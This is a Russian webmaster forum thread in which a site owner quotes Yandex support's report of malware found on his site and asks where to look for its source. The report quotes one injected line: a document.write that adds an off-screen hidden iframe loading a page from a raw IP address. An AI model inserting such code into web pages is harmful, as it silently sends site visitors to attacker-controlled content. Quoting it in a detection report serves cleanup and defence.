Вредоносный код. Ответ от Платона Щукина
Страницы: 1
Вредоносный код. Ответ от Платона Щукина
Пару дней назад написал письмо в Службу поддержки Яндекса по поводу частого обнаружения вредоносного кода на двух моих сайтах. Сегодня получил такой ответ:
Цитата
Здравствуйте!

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания:

document.write('<style>.ihxck4rb { position:absolute; left:-1493px; top:-1491px} </style> <div class="ihxck4rb"><iframe src="http://129.121.203.202/9eb29177f66d54745371ac1c4052487d/q.php" width="120" height="101"></iframe></div>');

который детектировался в скрипте /engine/classes/min/index.php?charset=windows-1251&g=general&4" .

Данный вредоносный код динамически вставляется в HTTP ответ для произвольного js-файла, поэтому, возможно, Вы не сможете обнаружить его в указанных нами js-фалах. Мы предполагаем, что источник этого кода может находится на серверной стороне сайта: бинарные файлы, модули, конфигурационные файлы и т.п.
Если у Вас есть возможность, мы будем благодарны за любые присланные файлы для анализа данного типа заражения.

Может кто подскажет какие файлы отправлять
Ну что вы скажите?
Что тут скажешь, iframe кто-то внедрил в код. Заходи в указанный им файл и удаляй не нужные строки.
KPeople: Как скачать видео с YouTube? (10 способов)


Так непонятно где искать. Этот файл /engine/classes/min/index.php проверил, ничего подобного не видел. Все файлы .js проверил. Тоже подобного кода не нашел
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
14:06 Слипание слов в блоке 
14:04 Яндекс-ап 20 марта и похороны ChatGPT, Claude и Gemini. Считаем убытки 
14:02 APK на паузе. Google убивает быстрый конверт 
11:34 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
22:45 Всем привет! 
19:37 Xrumer-полезный софт или нет? 
17:26 AI под надзором. Минцифры готовят клеймо для контента 
17:33 Продам жирный аккаунт fl.ru 
17:25 Подключение к API слотов! Connecting to the slots API! 
16:49  
14:10 Авито аккаунты ИП и физик 
13:34 AllCharge.online. Современный, быстрый и надёжный обменник 
13:14 TETChange-Обменник криптовалют 
10:36 Majento SiteAnalyzer - бесплатная программа для аудита и анализа сайта 
17:45 молодильные яблоки и живая вода 
15:04 Сайты Рунета 
13:59 8 марта: желаю аптайма 99.9% и e-e-a-t без локов 
01:42 Точные прогнозы на футбол 
08:52 Чак Норрис ушел - 19 марта 2026, 86 лет, семья подтвердила 
20:23 Панель Кнопки соцсетей 
14:03 Огородники